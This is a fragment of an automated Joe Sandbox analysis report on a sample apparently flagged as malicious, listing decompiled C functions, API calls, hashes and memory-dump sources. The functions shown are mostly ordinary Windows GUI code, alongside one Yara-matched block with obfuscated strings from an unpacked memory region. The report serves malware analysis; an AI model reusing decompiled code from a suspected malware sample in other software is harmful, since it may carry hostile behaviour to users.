                  					_t25 =  *0x466328 - _t17; // 0x0
                  					return 0 | _t25 != 0x00000000;
                  				}
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,745F5D80,0040C4A9,?,?,?,?,?,?,?,0040E929,00000000,00000002,00000028), ref: 0040C37F
                  • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 0040C39B
                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0040C3AC
                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0040C3BD
                  • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0040C3CE
                  • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0040C3DF
                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0040C3F0
                  • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 0040C401
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                  • API String ID: 667068680-68207542
                  • Opcode ID: 3e63bc07579a273cf3458e94ca2d048ab89fd83f7511a7af2d42a1a611f821d8
                  • Instruction ID: 97ffdccdbcf6cb09da46b2faea870da2eca337babe3f4635d63e23a0ead0a9a5
                  • Opcode Fuzzy Hash: 3e63bc07579a273cf3458e94ca2d048ab89fd83f7511a7af2d42a1a611f821d8
                  • Instruction Fuzzy Hash: 792150B1E10260ABC3115FB5ACC482A7EE8B28CB05362453FEC01E3352E3B850C99E5E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E0040B10C(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				CHAR* _t148;
                  				void* _t157;
                  				int _t191;
                  				int _t223;
                  				int _t225;
                  				int _t227;
                  				int _t230;
                  				intOrPtr* _t240;
                  				intOrPtr* _t241;
                  				intOrPtr* _t249;
                  				intOrPtr* _t250;
                  				signed int* _t252;
                  				int _t259;
                  				int _t261;
                  				void* _t264;
                  				int _t314;
                  				int _t339;
                  				int _t340;
                  				int _t346;
                  				struct HWND__** _t347;
                  				int _t348;
                  				int _t349;
                  				struct tagMENUITEMINFOA _t350;
                  				int _t351;
                  				void* _t353;
                  				void* _t356;
                  
                  				_t356 = __eflags;
                  				_t335 = __edx;
                  				_push(0x174);
                  				E00431A9B(E0044AF14, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t353 - 0x18)) = __ecx;
                  				E004014C0(_t353 - 0x10, __edx);
                  				_t337 = lstrlenA;
                  				 *(_t353 - 4) =  *(_t353 - 4) & 0x00000000;
                  				_t346 = lstrlenA("ReBarWindow32") + 1;
                  				_t148 = E004014F0(_t353 - 0x10, _t346);
                  				_t347 =  *(_t353 + 0xc);
                  				GetClassNameA( *_t347, _t148, _t346);
                  				E0040A356(_t353 - 0x10, 0xffffffff);
                  				 *(_t353 - 0x14) = E0040EE68(_t353 - 0x10, lstrlenA, _t347, _t356,  *_t347);
                  				if(E00409F00(_t353 - 0x10, _t335, "ReBarWindow32") != 0) {
                  					L37:
                  					_t348 = 0;
                  					L6:
                  					E004010B0( *((intOrPtr*)(_t353 - 0x10)) + 0xfffffff0, _t335);
                  					return E00431B73(_t348);
                  				}
                  				_t259 =  *(_t353 - 0x14);
                  				if(_t259 == 0 || E0041E99D(_t259, "@;E") == 0) {
                  					goto L37;
                  				} else {
                  					_t157 = E0040F898(_t259);
                  					if(_t157 == 0) {
                  						L7:
                  						E0041F754(_t259, _t353 - 0x78, _t337, _t347, __eflags);
                  						E004014C0(_t353 + 8, _t335);
                  						E004014C0(_t353 + 0xc, _t335);
                  						 *(_t353 - 4) = 3;
                  						E00422859(_t353 - 0x4c);
                  						_push( *((intOrPtr*)(_t353 - 0x18)));
                  						 *(_t353 - 4) = 4;
                  						E00422E1F(_t259, _t353 - 0xac, _t337, _t347, __eflags);
                  						 *((intOrPtr*)(_t353 - 0x180)) =  *((intOrPtr*)(_t259 + 0x98));
                  						 *(_t353 - 4) = 5;
                  						 *((intOrPtr*)(_t353 - 0x17c)) = 0x10;
                  						E004087FA(_t259, _t347[3], _t353 - 0x180);
                  						E00408830(_t259, _t347[3], _t353 - 0x88);
                  						_t260 = "ToolbarWindow32";
                  						_t339 = lstrlenA("ToolbarWindow32") + 1;
                  						GetClassNameA( *(_t353 - 0x160), E004014F0(_t353 - 0x10, _t339), _t339);
                  						E0040A356(_t353 - 0x10, 0xffffffff);
                  						_t340 = E0040EE68(_t353 - 0x10, _t339, _t347, __eflags,  *(_t353 - 0x160));
                  						 *(_t353 - 0x58) = _t340;
                  						__eflags = E00409F00(_t353 - 0x10, _t335, "ToolbarWindow32");
                  						if(__eflags != 0) {
                  							L36:
                  							 *(_t353 - 4) = 4;
                  							E00422E73(_t260, _t353 - 0xac, _t340, _t347, __eflags);
                  							 *(_t353 - 4) = 3;
                  							E00422E06(_t353 - 0x4c);
                  							E004010B0( &(( *(_t353 + 0xc))[0xfffffffffffffffc]), _t335);
                  							__eflags =  *((intOrPtr*)(_t353 + 8)) + 0xfffffff0;
                  							E004010B0( *((intOrPtr*)(_t353 + 8)) + 0xfffffff0, _t335);
                  							 *(_t353 - 4) = 0;
                  							E0040AED0(_t260, _t353 - 0x78, _t340, _t347, __eflags);
                  							goto L37;
                  						}
                  						__eflags = _t340;
                  						if(__eflags == 0) {
                  							goto L36;
                  						}
                  						__eflags = E0041E99D(_t340, 0x44fc0c);
                  						if(__eflags == 0) {
                  							goto L36;
                  						}
                  						_t349 =  &(_t347[6]);
                  						__eflags = _t349;
                  						 *((intOrPtr*)(_t353 - 0x80)) =  *_t349;
                  						 *(_t353 - 0x54) = _t349;
                  						E00422C3C( *(_t353 - 0x14), _t353 - 0x88);
                  						E00422BFB(_t340, _t353 - 0x88);
                  						_t261 = E00406ACA(_t340);
                  						 *(_t353 - 0x14) = _t261;
                  						while(1) {
                  							_t261 = _t261 - 1;
                  							 *(_t353 - 0x24) = _t261;
                  							E004087FA(_t340, _t261, _t353 - 0xec);
                  							_t191 = IntersectRect(_t353 - 0xfc, _t353 - 0x88, _t353 - 0xec);
                  							__eflags = _t191;
                  							if(_t191 != 0) {
                  								break;
                  							}
                  							__eflags = _t261;
                  							if(_t261 > 0) {
                  								continue;
                  							}
                  							break;
                  						}
                  						_t350 = 0x30;
                  						E00431160(_t340, _t353 - 0xdc, 0, _t350);
                  						 *(_t353 - 0xdc) = _t350;
                  						 *(_t353 - 0x28) = E00408817(_t340);
                  						E00423999(_t353 - 0x3c);
                  						 *((intOrPtr*)(_t353 - 0x3c)) = 0x44fff0;
                  						 *(_t353 - 4) = 6;
                  						E00425F9A(_t353 - 0x3c,  *(_t353 - 0x14) - _t261, 0xffffffff);
                  						E0041F51D(_t261, _t353 - 0x78, _t340, CreatePopupMenu());
                  						E0040876B(_t353 - 0x4c, _t353 - 0xac);
                  						_t351 = 0;
                  						while(1) {
                  							__eflags = _t261 -  *(_t353 - 0x14);
                  							if(__eflags >= 0) {
                  								break;
                  							}
                  							E00406956(_t340, _t335, __eflags, _t261, _t353 - 0x20, _t353 - 0x50, _t353 - 0x1c);
                  							__eflags =  *(_t353 - 0x50) & 0x00000001;
                  							if(( *(_t353 - 0x50) & 0x00000001) != 0) {
                  								__eflags = _t351;
                  								if(_t351 == 0) {
                  									L29:
                  									_t261 = _t261 + 1;
                  									__eflags = _t261;
                  									 *(_t353 - 0x24) = _t261;
                  									continue;
                  								}
                  								 *((intOrPtr*)(_t353 - 0xd8)) = 0x100;
                  								 *((intOrPtr*)(_t353 - 0xd4)) = 0x800;
                  								L28:
                  								InsertMenuItemA( *(_t353 - 0x74), _t261, 1, _t353 - 0xdc);
                  								goto L29;
                  							}
                  							 *((intOrPtr*)(_t353 - 0xd8)) = 0x162;
                  							_t223 = E00402720(_t353 + 8,  *((intOrPtr*)(_t353 - 0x20)));
                  							__eflags = _t223;
                  							if(_t223 == 0) {
                  								E00401E30(_t353 + 0xc);
                  							} else {
                  								E0041B29E(_t353 + 0xc,  *((intOrPtr*)(_t353 + 8)), 1, 0xa);
                  							}
                  							_t225 = E00404461(__eflags, 8);
                  							__eflags = _t225;
                  							if(_t225 == 0) {
                  								_t225 = 0;
                  								__eflags = 0;
                  							} else {
                  								 *(_t225 + 4) =  *(_t225 + 4) & 0x00000000;
                  								 *_t225 = 0x4502c8;
                  							}
                  							E004260C0(_t261, _t353 - 0x3c, _t351, _t225);
                  							_t227 =  *(_t353 - 0x28);
                  							__eflags = _t227;
                  							if(_t227 == 0) {
                  								L24:
                  								_t102 = _t353 - 0xbc;
                  								 *_t102 =  *(_t353 - 0xbc) & 0x00000000;
                  								__eflags =  *_t102;
                  								goto L25;
                  							} else {
                  								_t230 = E0040A2E6(_t353 - 0x11c,  *((intOrPtr*)(_t227 + 4)),  *((intOrPtr*)(_t353 - 0x1c)), _t353 - 0x11c);
                  								__eflags = _t230;
                  								if(_t230 == 0) {
                  									goto L24;
                  								}
                  								CopyRect(_t353 - 0x68, _t353 - 0x10c);
                  								OffsetRect(_t353 - 0x68,  ~( *(_t353 - 0x68)),  ~( *(_t353 - 0x64)));
                  								E00408744( *((intOrPtr*)(E0040B917(_t353 - 0x3c, _t351))), _t353 - 0xac,  *((intOrPtr*)(_t353 - 0x60)),  *((intOrPtr*)(_t353 - 0x5c)));
                  								_t240 = E0040B917(_t353 - 0x3c, _t351);
                  								_t241 = E0040B917(_t353 - 0x3c, _t351);
                  								 *_t241 = E00408791(_t353 - 0x4c,  *_t240);
                  								E00423E9D(_t353 - 0x4c, _t353 - 0x68, GetSysColor(4));
                  								E0040A307( *(_t353 - 0x28), _t353 - 0x4c,  *((intOrPtr*)(_t353 - 0x1c)), 0, 0, 1);
                  								_t249 = E0040B917(_t353 - 0x3c, _t351);
                  								_t250 = E0040B917(_t353 - 0x3c, _t351);
                  								 *_t250 = E00408791(_t353 - 0x4c,  *_t249);
                  								_t252 = E0040B917(_t353 - 0x3c, _t351);
                  								_t340 =  *(_t353 - 0x58);
                  								_t261 =  *(_t353 - 0x24);
                  								 *(_t353 - 0xbc) =  *_t252;
                  								L25:
                  								 *(_t353 - 0xb8) =  *(_t353 + 0xc);
                  								 *((intOrPtr*)(_t353 - 0xcc)) =  *((intOrPtr*)(_t353 - 0x20));
                  								 *((intOrPtr*)(_t353 - 0xd4)) = 0x100;
                  								_t351 = _t351 + 1;
                  								goto L28;
                  							}
                  						}
                  						E00413342(_t353 - 0x98,  *(_t353 - 0x54));
                  						E00422C3C( *((intOrPtr*)(_t353 - 0x18)), _t353 - 0x98);
                  						E0040D8F0(_t353 - 0x78, __eflags, 0,  *((intOrPtr*)(_t353 - 0x98)),  *((intOrPtr*)(_t353 - 0x8c)),  *((intOrPtr*)(_t353 - 0x18)), 0);
                  						_t264 = 0;
                  						 *((intOrPtr*)( *((intOrPtr*)(_t353 + 0x10)))) = 0;
                  						__eflags = _t351;
                  						if(__eflags <= 0) {
                  							L35:
                  							 *(_t353 - 4) = 5;
                  							E004239B0(_t353 - 0x3c);
                  							 *(_t353 - 4) = 4;
                  							E00422E73(_t264, _t353 - 0xac, 0, _t351, __eflags);
                  							 *(_t353 - 4) = 3;
                  							E00422E06(_t353 - 0x4c);
                  							E004010B0( &(( *(_t353 + 0xc))[0xfffffffffffffffc]), _t335);
                  							E004010B0( *((intOrPtr*)(_t353 + 8)) + 0xfffffff0, _t335);
                  							 *(_t353 - 4) = 0;
                  							E0040AED0(_t264, _t353 - 0x78, 0, _t351, __eflags);
                  							_t348 = 1;
                  							goto L6;
                  						} else {
                  							goto L32;
                  						}
                  						do {
                  							L32:
                  							_t314 =  *(E0040B917(_t353 - 0x3c, _t264));
                  							__eflags = _t314;
                  							if(_t314 != 0) {
                  								 *((intOrPtr*)( *_t314 + 4))(1);
                  							}
                  							_t264 = _t264 + 1;
                  							__eflags = _t264 - _t351;
                  						} while (__eflags < 0);
                  						goto L35;
                  					}
                  					_t361 =  *((intOrPtr*)(_t353 - 0x18)) - _t157;
                  					if( *((intOrPtr*)(_t353 - 0x18)) == _t157) {
                  						goto L7;
                  					}
                  					_t348 = E0040B10C(_t259, _t157, _t335, lstrlenA, _t347, _t361,  *((intOrPtr*)(_t353 + 8)), _t347,  *((intOrPtr*)(_t353 + 0x10)));
                  					goto L6;
                  				}
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0040B116
                  • lstrlenA.KERNEL32(ReBarWindow32,00000174), ref: 0040B136
                  • GetClassNameA.USER32(?,00000000,00000001), ref: 0040B14B
                  • lstrlenA.KERNEL32(ToolbarWindow32), ref: 0040B242
                  • GetClassNameA.USER32(?,00000000,00000001), ref: 0040B258
                  • IntersectRect.USER32 ref: 0040B301
                  • _memset.LIBCMT ref: 0040B31C
                  • CreatePopupMenu.USER32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,@;E), ref: 0040B357
                  • CopyRect.USER32 ref: 0040B421
                  • OffsetRect.USER32(?,?,?), ref: 0040B437
                  • GetSysColor.USER32(00000004), ref: 0040B47E
                  • InsertMenuItemA.USER32(?,?,00000001,?), ref: 0040B52C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$ClassMenuNamelstrlen$ColorCopyCreateH_prolog3InsertIntersectItemOffsetPopup_memset
                  • String ID: @;E$ReBarWindow32$ToolbarWindow32
                  • API String ID: 3448309770-254675463
                  • Opcode ID: debc111b5dd1307f9d66f393594e2bf0b962d8dc5b9a3f3562b75b86374ad59f
                  • Instruction ID: cf85aa8ededd028deaa69243dfe9d59f927a8dbf855ff73a4b859d4dc9167fbb
                  • Opcode Fuzzy Hash: debc111b5dd1307f9d66f393594e2bf0b962d8dc5b9a3f3562b75b86374ad59f
                  • Instruction Fuzzy Hash: CFE17C71900219ABDF15EBA1CC91EEEB778EF04308F10416EF916B72D2DB385A44CB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 02316E94
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: ''X$:1F$CP^-$VIQZ$V`.$[s4+$`4TI$f$s9NQ$u,y$x5\$)n/$Hq$SUP
                  • API String ID: 1029625771-1276608707
                  • Opcode ID: 8e9fb712d350e78819365e234c02ee184ffd8b81666fe236b2271e37ea13c3bd
                  • Instruction ID: 2e520913ce5c4e90c0d6e98d415737df709cc30cca05f59721159df75282cbdb
                  • Opcode Fuzzy Hash: 8e9fb712d350e78819365e234c02ee184ffd8b81666fe236b2271e37ea13c3bd
                  • Instruction Fuzzy Hash: 5C42A5F08063698BDB659F429A897CDBB74BB11704F6096C8D25D3B224CB750BC6CF89
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0040E839(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                  				signed int _v8;
                  				intOrPtr _v12;
                  				struct tagRECT _v28;
                  				struct tagRECT _v44;
                  				struct tagRECT _v60;
                  				struct tagRECT _v80;
                  				char _v100;
                  				void* __edi;
                  				intOrPtr _t58;
                  				struct HWND__* _t59;
                  				intOrPtr _t94;
                  				signed int _t103;
                  				struct HWND__* _t104;
                  				void* _t105;
                  				struct HWND__* _t107;
                  				long _t108;
                  				long _t116;
                  				void* _t119;
                  				struct HWND__* _t121;
                  				void* _t123;
                  				intOrPtr _t125;
                  				intOrPtr _t129;
                  
                  				_t119 = __edx;
                  				_t105 = __ebx;
                  				_t125 = __ecx;
                  				_v12 = __ecx;
                  				_v8 = E00412B38(__ecx);
                  				_t58 = _a4;
                  				if(_t58 == 0) {
                  					if((_v8 & 0x40000000) == 0) {
                  						_t59 = GetWindow( *(__ecx + 0x20), 4);
                  					} else {
                  						_t59 = GetParent( *(__ecx + 0x20));
                  					}
                  					_t121 = _t59;
                  					if(_t121 != 0) {
                  						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
                  						if(_t104 != 0) {
                  							_t121 = _t104;
                  						}
                  					}
                  				} else {
                  					_t4 = _t58 + 0x20; // 0xc033d88b
                  					_t121 =  *_t4;
                  				}
                  				_push(_t105);
                  				GetWindowRect( *(_t125 + 0x20),  &_v60);
                  				if((_v8 & 0x40000000) != 0) {
                  					_t107 = GetParent( *(_t125 + 0x20));
                  					GetClientRect(_t107,  &_v28);
                  					GetClientRect(_t121,  &_v44);
                  					MapWindowPoints(_t121, _t107,  &_v44, 2);
                  				} else {
                  					if(_t121 != 0) {
                  						_t103 = GetWindowLongA(_t121, 0xfffffff0);
                  						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
                  							_t121 = 0;
                  						}
                  					}
                  					_v100 = 0x28;
                  					if(_t121 != 0) {
                  						GetWindowRect(_t121,  &_v44);
                  						E0040C509(_t121, E0040C49C(_t121, 2),  &_v100);
                  						CopyRect( &_v28,  &_v80);
                  					} else {
                  						_t94 = E00403AA0();
                  						if(_t94 != 0) {
                  							_t94 =  *((intOrPtr*)(_t94 + 0x20));
                  						}
                  						E0040C509(_t121, E0040C49C(_t94, 1),  &_v100);
                  						CopyRect( &_v44,  &_v80);
                  						CopyRect( &_v28,  &_v80);
                  					}
                  				}
                  				_t108 = _v60.left;
                  				asm("cdq");
                  				_t123 = _v60.right - _t108;
                  				asm("cdq");
                  				_t120 = _v44.bottom;
                  				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
                  				_a4 = _v60.bottom - _v60.top;
                  				asm("cdq");
                  				asm("cdq");
                  				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
                  				if(_t123 + _t116 > _v28.right) {
                  					_t116 = _t108 - _v60.right + _v28.right;
                  				}
                  				if(_t116 < _v28.left) {
                  					_t116 = _v28.left;
                  				}
                  				if(_a4 + _t129 > _v28.bottom) {
                  					_t129 = _v60.top - _v60.bottom + _v28.bottom;
                  				}
                  				if(_t129 < _v28.top) {
                  					_t129 = _v28.top;
                  				}
                  				return E00412D05(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
                  			}

                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetParent.USER32(?), ref: 0040E868
                  • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 0040E88B
                  • GetWindowRect.USER32 ref: 0040E8A5
                  • GetWindowLongA.USER32 ref: 0040E8BB
                  • CopyRect.USER32 ref: 0040E908
                  • CopyRect.USER32 ref: 0040E912
                  • GetWindowRect.USER32 ref: 0040E91B
                  • CopyRect.USER32 ref: 0040E937
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Window$Copy$Long$MessageParentSend
                  • String ID: (
                  • API String ID: 808654186-3887548279
                  • Opcode ID: a95a7ec90529cae69c10791c29425d7303bfcfd659ec3fe840824abf005b3b54
                  • Instruction ID: ae4a21a952a57d180e51b079893b1d30c26c389abd653013c1f1d069e54050a6
                  • Opcode Fuzzy Hash: a95a7ec90529cae69c10791c29425d7303bfcfd659ec3fe840824abf005b3b54
                  • Instruction Fuzzy Hash: 24514F72900219ABDB00DFAADD85EEEBBB9BF48314F154526F905F3290DB34E9118B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E0041C904(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t172;
                  				long _t176;
                  				long _t178;
                  				intOrPtr _t186;
                  				intOrPtr _t190;
                  				struct HBRUSH__* _t237;
                  				intOrPtr* _t242;
                  				intOrPtr _t247;
                  				signed int* _t274;
                  				intOrPtr* _t293;
                  				intOrPtr* _t296;
                  				intOrPtr _t329;
                  				intOrPtr _t343;
                  				intOrPtr _t344;
                  				void* _t345;
                  				signed int _t347;
                  				intOrPtr* _t353;
                  				intOrPtr _t358;
                  				int _t361;
                  				intOrPtr* _t362;
                  				int _t363;
                  				void* _t365;
                  
                  				_push(0x78);
                  				_t172 = E00431A9B(E0044BA35, __ebx, __edi, __esi);
                  				_t296 = __ecx;
                  				if( *((intOrPtr*)(__ecx + 0x8c)) == 0 ||  *((intOrPtr*)(__ecx + 0x98)) == 0) {
                  					L27:
                  					return E00431B73(_t172);
                  				} else {
                  					_t353 =  *((intOrPtr*)(_t365 + 8));
                  					E0041B41D(_t353, _t365 - 0x2c);
                  					 *((intOrPtr*)(_t365 - 0x38)) = 0;
                  					 *((intOrPtr*)(_t365 - 0x3c)) = 0x452f3c;
                  					 *(_t365 - 4) = 0;
                  					_t176 = GetSysColor(6);
                  					_t8 = _t365 - 0x3c; // 0x452f3c
                  					E0041B3F9(_t8, 0, 2, _t176);
                  					 *(_t365 - 0x30) =  *(_t365 - 0x30) & 0x00000000;
                  					 *((intOrPtr*)(_t365 - 0x34)) = 0x452f3c;
                  					 *(_t365 - 4) = 1;
                  					_t178 = GetSysColor(0x10);
                  					_t358 = 0;
                  					_t13 = _t365 - 0x34; // 0x452f3c
                  					E0041B3F9(_t13, 0, 3, _t178);
                  					 *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x134)) + 0x10)) = 1;
                  					 *((intOrPtr*)(_t365 - 0x10)) = 0;
                  					if( *((intOrPtr*)(_t296 + 0x118)) <= 0) {
                  						L26:
                  						_t162 = _t365 - 0x3c; // 0x452f3c
                  						E004230B1(_t162);
                  						_t163 = _t365 - 0x34; // 0x452f3c
                  						E004230B1(_t163);
                  						_t164 = _t365 - 0x34; // 0x452f3c
                  						 *(_t365 - 4) = 0;
                  						 *((intOrPtr*)(_t365 - 0x34)) = 0x452f3c;
                  						E0040ADD4(_t296, _t164, _t353, 0x452f3c, _t383);
                  						 *(_t365 - 4) =  *(_t365 - 4) | 0xffffffff;
                  						_t169 = _t365 - 0x3c; // 0x452f3c
                  						 *((intOrPtr*)(_t365 - 0x3c)) = 0x452f3c;
                  						_t172 = E0040ADD4(_t296, _t169, _t353, 0x452f3c,  *(_t365 - 4));
                  						goto L27;
                  					} else {
                  						 *(_t365 - 0x14) =  *(_t365 - 0x14) & 0;
                  						goto L5;
                  						L12:
                  						 *(_t365 - 0x1c) = GetDeviceCaps(( *(_t296 + 0x90))[2], 0xa);
                  						SetRect( *((intOrPtr*)(_t296 + 0x134)) + 0x24, 0, 0, GetDeviceCaps(( *(_t296 + 0x90))[2], 8),  *(_t365 - 0x1c));
                  						E0041A5C8( *(_t296 + 0x90),  *((intOrPtr*)(_t296 + 0x134)) + 0x24);
                  						 *((intOrPtr*)( *_t353 + 0x1c))();
                  						_t361 =  *((intOrPtr*)(_t296 + 0xb0)) +  *(_t365 - 0x14);
                  						 *(_t365 - 0x1c) = _t361;
                  						if( *((intOrPtr*)(_t361 + 0x18)) == 0) {
                  							 *((intOrPtr*)( *_t296 + 0x194))( *((intOrPtr*)(_t365 - 0x10)));
                  							if( *((intOrPtr*)(_t296 + 0x10c)) != 0) {
                  								_t274 = E0041954D(_t296, _t365 - 0x44);
                  								 *(_t365 - 0x2c) =  ~( *_t274);
                  								 *(_t365 - 0x28) =  ~(_t274[1]);
                  								if( *((intOrPtr*)(_t296 + 0x80)) != 0) {
                  									GetClientRect( *(_t296 + 0x20), _t365 - 0x84);
                  									_t343 =  *((intOrPtr*)(_t296 + 0x68));
                  									if(_t343 <  *((intOrPtr*)(_t365 - 0x7c)) -  *(_t365 - 0x84)) {
                  										asm("cdq");
                  										 *(_t365 - 0x2c) =  *((intOrPtr*)(_t365 - 0x7c)) -  *(_t365 - 0x84) - _t343 - _t347 >> 1;
                  									}
                  									_t344 =  *((intOrPtr*)(_t296 + 0x6c));
                  									if(_t344 <  *((intOrPtr*)(_t365 - 0x78)) -  *((intOrPtr*)(_t365 - 0x80))) {
                  										asm("cdq");
                  										 *(_t365 - 0x28) =  *((intOrPtr*)(_t365 - 0x78)) -  *((intOrPtr*)(_t365 - 0x80)) - _t344 - _t347 >> 1;
                  									}
                  								}
                  							}
                  						}
                  						 *((intOrPtr*)( *_t353 + 0x34))(1);
                  						E004192C7(_t353, _t365 - 0x4c,  *(_t365 - 0x2c),  *(_t365 - 0x28));
                  						E00422AAE(_t353, _t365 - 0x54, 0, 0);
                  						 *((intOrPtr*)( *_t353 + 0x24))(5);
                  						_t83 = _t365 - 0x3c; // 0x452f3c
                  						E00423194(_t353, _t83);
                  						E0041B443(_t353, _t361);
                  						_t84 = _t365 - 0x34; // 0x452f3c
                  						E00423194(_t353, _t84);
                  						E00422BBC(_t353, _t365 - 0x5c,  *((intOrPtr*)(_t361 + 8)) + 1,  *((intOrPtr*)(_t361 + 4)) + 3);
                  						E004226D4(_t353,  *((intOrPtr*)(_t361 + 8)) + 1,  *((intOrPtr*)(_t361 + 0xc)) + 1);
                  						E00422BBC(_t353, _t365 - 0x64,  *_t361 + 3,  *((intOrPtr*)(_t361 + 0xc)) + 1);
                  						E004226D4(_t353,  *((intOrPtr*)(_t361 + 8)) + 1,  *((intOrPtr*)(_t361 + 0xc)) + 1);
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						 *(_t365 - 0x74) =  *(_t365 - 0x74) + 1;
                  						 *((intOrPtr*)(_t365 - 0x70)) =  *((intOrPtr*)(_t365 - 0x70)) + 1;
                  						 *((intOrPtr*)(_t365 - 0x6c)) =  *((intOrPtr*)(_t365 - 0x6c)) - 2;
                  						 *((intOrPtr*)(_t365 - 0x68)) =  *((intOrPtr*)(_t365 - 0x68)) - 2;
                  						_t237 = GetStockObject(0);
                  						_t362 =  *((intOrPtr*)(_t365 + 8));
                  						FillRect( *(_t362 + 4), _t365 - 0x74, _t237);
                  						 *((intOrPtr*)( *_t362 + 0x20))(0xffffffff);
                  						_t242 =  *((intOrPtr*)(_t296 + 0x134));
                  						_t353 =  *((intOrPtr*)(_t365 - 0x10));
                  						if( *((intOrPtr*)(_t242 + 0x10)) == 0) {
                  							L23:
                  							 *((intOrPtr*)( *( *(_t296 + 0x90)) + 0x18))();
                  							 *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x94)) + 0x20))( *((intOrPtr*)(_t365 - 0x18)));
                  							__eflags = _t353;
                  							if(_t353 == 0) {
                  								_t247 =  *((intOrPtr*)(_t296 + 0x114));
                  								__eflags = _t247 - 1;
                  								if(_t247 > 1) {
                  									__eflags = _t247 - 1;
                  									E0041BAC8(_t296, _t247 - 1, 1);
                  								}
                  							}
                  							goto L26;
                  						} else {
                  							_t329 =  *((intOrPtr*)(_t296 + 0x114));
                  							if(_t329 + _t353 > ( *( *((intOrPtr*)( *_t242 + 0x74)) + 0x1e) & 0x0000ffff)) {
                  								goto L23;
                  							}
                  							_t353 = _t353 + 1;
                  							 *((intOrPtr*)( *_t296 + 0x198))(_t329, _t353);
                  							_t363 =  *(_t365 - 0x1c);
                  							E0042DC27( *(_t296 + 0x90),  *((intOrPtr*)(_t363 + 0x18)),  *((intOrPtr*)(_t363 + 0x1c)));
                  							 *((intOrPtr*)( *( *(_t296 + 0x90)) + 0x74))(0xd, 0, 0, _t365 - 0x24);
                  							E0042D602( *(_t296 + 0x90), _t365 - 0x24);
                  							 *((intOrPtr*)(_t365 - 0x24)) =  *((intOrPtr*)(_t365 - 0x24)) +  *_t363;
                  							 *((intOrPtr*)(_t365 - 0x20)) =  *((intOrPtr*)(_t365 - 0x20)) +  *((intOrPtr*)(_t363 + 4));
                  							 *((intOrPtr*)(_t365 - 0x24)) =  *((intOrPtr*)(_t365 - 0x24)) + 1;
                  							 *((intOrPtr*)(_t365 - 0x24)) =  *((intOrPtr*)(_t365 - 0x24)) +  *(_t365 - 0x2c);
                  							 *((intOrPtr*)(_t365 - 0x20)) =  *((intOrPtr*)(_t365 - 0x20)) + 1;
